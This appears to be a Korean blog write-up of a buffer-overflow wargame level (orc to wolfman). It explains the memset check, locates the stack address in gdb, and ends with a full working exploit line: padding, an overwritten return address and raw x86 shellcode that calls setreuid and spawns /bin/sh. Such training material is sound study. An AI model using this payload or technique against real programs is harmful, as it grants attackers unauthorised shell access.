wolfman 문제
Orc 문제랑 별 차이가 없어 보인다 memset 함수로 버퍼 값을 다 0으로 만들어 주는거 같은데 어짜피 argv[] 함수 뒤에 메모리 공간을 이용해 버리면
아까와 같은 문제 같다
gdb로 확인해 보면
0xbffffac0 부터 쉘이 올라가니까 eip 주소를 여기로 설정하고 쉘을 올리면 될꺼 같다
쉘이 올라간걸 확인 할 수있다
eip에 쉘 시작 주소를 대입해주면 쉘 권한이 획득 된다.
$(python -c 'print "A"* 44+"\xc0\xfa\xff\xbf"+"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x52\x8d\x5c\x24\x04\x53\xb0\x0b\x8b\x1c\x24\x8d\x0c\x24\xcd\x80"')
'WARGAME > BOF' 카테고리의 다른 글
| [BOF] darkelf->orge (0) | 2018.02.19 |
|---|---|
| [BOF] wolfman->darkelf (0) | 2018.02.08 |
| [BOF] Goblin-> orc (0) | 2018.02.08 |
| [BOF] cobolt-> Goblin (0) | 2018.02.08 |
| [BOF] gremlin-> cobolt (0) | 2018.02.08 |